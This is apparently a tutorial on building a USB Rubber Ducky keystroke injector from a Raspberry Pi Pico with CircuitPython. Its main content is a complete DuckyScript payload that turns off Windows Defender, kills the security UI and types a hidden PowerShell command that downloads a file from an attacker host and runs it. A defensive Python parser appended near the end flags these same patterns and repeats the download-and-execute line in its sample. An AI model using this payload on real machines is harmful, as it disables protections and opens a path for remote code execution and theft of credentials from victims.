What Is USB Rubber Ducky?
The USB Rubber Ducky is an HID (Human Interface Device) that looks like a USB pen drive. It can be used to inject keystrokes into a system, to hack a system, to steal a victim's essential data and credentials, and to inject payloads onto the victim's computer. The most important thing about the USB Rubber Ducky is that it cannot be detected by any antivirus or firewall, because it acts as an HID device.
Tools & Software Required:
- A computer to configure the pico-ducky (Windows 10 is used here)
- Raspberry Pi Pico
- CircuitPython
Configuring Raspberry Pi Pico
First, we need to set up the Raspberry Pi Pico to show up as an HID device. The steps to configure it:
Step 1:
- Download CircuitPython.
- Plug your Raspberry Pi Pico into your PC.
- Copy the downloaded .uf2 file onto the Raspberry Pi Pico.
- Unplug the Raspberry Pi Pico and plug it in again.
Your Raspberry Pi Pico will now reconnect as CircuitPython.
Step 2:
- To make the Raspberry Pi Pico pretend to be an HID device, we have to download the HID library.
- HID library download link ⇒ adafruit-circuitpython-bundle-6.x-mpy-20210130.zip
- Extract the archive you have downloaded.
- Open the extracted folder and go to ⇒ lib ⇒ adafruit_hid
- Copy the adafruit_hid folder and paste it into the Raspberry Pi Pico ⇒ lib folder.
Step 3:
- Delete the code.py file from the Raspberry Pi Pico.
- After deleting it, download the Python file that will convert our payload. File download link ⇒ pico-ducky
- When the download is complete, open the folder and copy the duckyinpython.py file to the Raspberry Pi Pico.
- Rename the duckyinpython.py file to code.py.
Congrats, your Raspberry Pi Pico is now a USB Rubber Ducky.
Using Payload With The Pico-Ducky
Now that we have configured our Raspberry Pi Pico to work as a USB Rubber Ducky, we have to upload a payload that will run when the Pico is plugged into a PC.
Step 1: Open Notepad and paste any script available at the pico-ducky GitHub repository. For now, I will be using my own script, which is given below.
Step 2: When you save the file, change the "Save as type" to All Files, name the file payload.dd, and save it to the Raspberry Pi Pico.
!!Warning: As soon as you save the file, the script will run.
The script below turns off Windows Defender, then clears the Action Center and creates a reverse shell:
REM tested on: Windows 10
REM author: sploitech.com
REM turn off windows defender then clear action center & create a reverse shell
REM article URL: https://sploitech.com/raspberry-pi-projects/how-to-create-usb-rubber-ducky-with-raspberry-pi-pico/
REM This script is for educational purpose only.
GUI
DELAY 250
STRING Windows Defender Settings
DELAY 200
ENTER
DELAY 3000
ENTER
DELAY 1500
TAB
REPEAT 3
ENTER
DELAY 500
SPACE
DELAY 2500
LEFT
ENTER
TAB
SPACE
DELAY 500
TAB
SPACE
DELAY 500
TAB
SPACE
TAB
TAB
SPACE
GUI
DELAY 500
STRING Command Prompt
DELAY 200
ENTER
DELAY 1000
STRING taskkill/im SecHealthUI.exe -F
ENTER
DELAY 100
STRING exit
ENTER
DELAY 2000
GUI + a
DELAY 500
TAB
REPEAT 4
DELAY 500
ENTER
GUI + a
DELAY 150
GUI r
DELAY 1000
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://<I.p_address>/<shell_name>','%TEMP%\<shell_name>');Start-Process "%TEMP%\<shell_name>"
ENTER
You will have to enter your own payload location on the highlighted line no. 56.
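Seen from the defender's side, a payload.dd recovered from a suspect device can be read statically before anything is plugged in. The following is an added example, not code from the original article or the pico-ducky project: it parses the subset of DuckyScript used above (REM, DELAY, STRING, REPEAT, key names) and flags what the script would type. The rule names and the sample excerpt are constructed for illustration.

```python
import re

# Constructed sample in the page's DuckyScript dialect; <...> placeholders stay unfilled.
SAMPLE = """\
REM constructed excerpt
STRING Windows Defender Settings
TAB
REPEAT 3
STRING taskkill/im SecHealthUI.exe -F
GUI r
DELAY 1000
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://<I.p_address>/<shell_name>','<path>');Start-Process "<path>"
"""

# Hypothetical rule names; each pattern matches text the payload above types.
RULES = [
    ("defender-settings-opened", re.compile(r"windows defender", re.I)),
    ("security-ui-killed", re.compile(r"taskkill.*SecHealthUI", re.I)),
    ("hidden-powershell", re.compile(r"powershell.*-windowstyle\s+hidden", re.I)),
    ("download-and-execute", re.compile(r"DownloadFile.*Start-Process", re.I)),
]

def parse(script):
    """Expand REPEAT and return (typed_strings, total_delay_ms, key_steps)."""
    typed, delay_ms, key_steps, prev = [], 0, 0, None
    for raw in script.splitlines():
        cmd, _, arg = raw.strip().partition(" ")
        cmd = cmd.upper()
        if cmd in ("", "REM"):
            continue
        if cmd == "REPEAT":  # replay the previous command `arg` more times
            steps = [prev] * int(arg) if prev and arg.strip().isdigit() else []
        else:
            steps = [prev := (cmd, arg)]
        for c, a in steps:
            if c == "DELAY":
                delay_ms += int(a) if a.strip().isdigit() else 0
            elif c == "STRING":
                typed.append(a)
            else:
                key_steps += 1  # single key or chord such as "GUI r"
    return typed, delay_ms, key_steps

def triage(script):
    typed, delay_ms, key_steps = parse(script)
    findings = [name for name, rx in RULES if any(rx.search(s) for s in typed)]
    return {"findings": findings, "delay_ms": delay_ms, "key_steps": key_steps}

print(triage(SAMPLE))
```

The same patterns can be applied to process command-line logs on the host, since the typed strings end up as the arguments of taskkill and powershell.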
Link to other types of payload: